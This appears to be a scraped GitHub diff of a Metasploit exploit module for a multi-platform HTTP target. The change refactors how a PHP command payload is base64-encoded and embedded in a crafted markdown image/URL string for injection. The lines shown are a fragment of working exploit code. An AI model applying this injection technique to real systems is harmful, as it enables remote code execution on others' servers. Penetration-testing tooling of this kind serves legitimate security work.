File tree Expand file tree Collapse file tree 1 file changed +4
-3
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +4
-3
lines changed Original file line number Diff line number Diff line change @@ -104,13 +104,14 @@ def php_exec_cmd(encoded_payload)
104
104
$c = base64_decode("#{ encoded_clean_payload } ");
105
105
#{ php_system_block ( cmd_varname : '$c' , disabled_varname : dis ) }
106
106
END_OF_PHP_CODE
107
- return framework . encoders . create ( 'php/base64' ) . encode ( shell )
107
+ return shell
108
108
end
109
109
110
110
def exploit
111
111
print_status ( 'Preparing to send exploit payload to the target...' )
112
- compacted_payload = target [ 'Arch' ] == ARCH_PHP ? framework . encoders . create ( 'php/base64' ) . encode ( payload . encoded ) : php_exec_cmd ( payload . encoded )
113
- payload = "[<img#{ Rex ::Text . rand_text_numeric ( 8 ) } >->URL`<?php #{ compacted_payload } ?>`]"
112
+ phped_payload = target [ 'Arch' ] == ARCH_PHP ? payload . encoded : php_exec_cmd ( payload . encoded )
113
+ b64_payload = framework . encoders . create ( 'php/base64' ) . encode ( phped_payload )
114
+ payload = "[<img#{ Rex ::Text . rand_text_numeric ( 8 ) } >->URL`<?php #{ b64_payload } ?>`]"
114
115
115
116
Rex . sleep ( 0.5 )
116
117
You can’t perform that action at this time.
0 commit comments